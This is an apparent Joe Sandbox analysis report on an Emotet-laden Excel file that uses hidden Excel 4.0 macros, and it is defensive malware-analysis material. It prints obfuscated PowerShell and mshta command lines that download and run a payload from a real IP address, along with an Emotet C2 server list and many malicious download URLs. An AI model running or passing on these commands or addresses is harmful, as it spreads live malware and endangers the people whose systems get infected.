Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
imedpub_6.xls

Overview

General Information

Sample Name:imedpub_6.xls
Analysis ID:562403
MD5:eee4085b8c00a4dbae2459b0f97ebeb7
SHA1:c449b3584ff6db4b37c402aa27ed8b6793b5bd74
SHA256:b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1944 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2676 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1996 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2952 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2624 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1164 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1988 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 196 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
imedpub_6.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub_6.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\imedpub_6.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x12ca2:$s1: Excel
    • 0x13d08:$s1: Excel
    • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\imedpub_6.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\JooSee.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 67 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  13.2.rundll32.exe.3b0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    13.2.rundll32.exe.620000.2.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      13.2.rundll32.exe.27b0000.8.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        15.2.rundll32.exe.2630000.12.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          15.2.rundll32.exe.2830000.16.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 100 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1996, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2676, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 1996
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1944, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2676
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://maxtdeveloper.com/okw9yx/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/PE3Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fAvira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.pngAvira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admAvira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.comAvira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.comAvira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/PE3Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/PE3Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/9Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/PE3Avira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/Avira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-contAvira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/PE3Avira URL Cloud: Label: malware
